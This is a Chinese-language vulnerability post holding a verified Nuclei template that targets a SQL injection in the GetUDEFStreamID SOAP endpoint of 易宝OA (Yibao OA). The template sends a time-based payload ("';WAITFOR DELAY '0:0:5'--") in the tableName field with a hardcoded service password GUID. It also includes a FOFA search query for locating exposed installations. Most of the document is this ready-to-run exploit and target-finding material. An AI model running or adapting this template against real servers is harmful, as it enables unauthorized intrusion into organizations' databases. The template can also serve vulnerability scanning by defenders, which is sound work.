【通用】易宝OA GetUDEFStreamID Sql注入

fofa语句

yakit插件 uuid

poc

yakit yaml

nuclei yaml

id: yibao_OA-GetUDEFStreamID-sqli

info:
  name: 易宝OA-GetUDEFStreamID-SQL注入
  author: dreamer292 from 秃兔安全_tutusec.com
  severity: high
  description: 易宝OA系统GetUDEFStreamID接口存在SQL注入漏洞 检测方式为延时注入容易误报
  metadata:
    max-request: 1
    fofa-query: title="欢迎登录易宝OA系统" || banner="易宝OA"
    verified: true


http:
- raw:
  - |+
    @timeout: 30s
    POST /WebService/BasicService.asmx HTTP/1.1
    Host: {{Hostname}}
    Content-Type: text/xml; charset=utf-8
    Content-Length: 484
    SOAPAction: "http://tempuri.org/GetUDEFStreamID"

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body>
        <GetUDEFStreamID xmlns="http://tempuri.org/">
          <tableName>';WAITFOR DELAY '0:0:5'--</tableName>
          <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
        </GetUDEFStreamID>
      </soap:Body>
    </soap:Envelope>




  max-redirects: 3
  matchers-condition: and
  matchers:
    - type: dsl
      dsl:   
        - 'duration>=5'

# Generated From WebFuzzer on 2024-12-07 12:27:44

已验证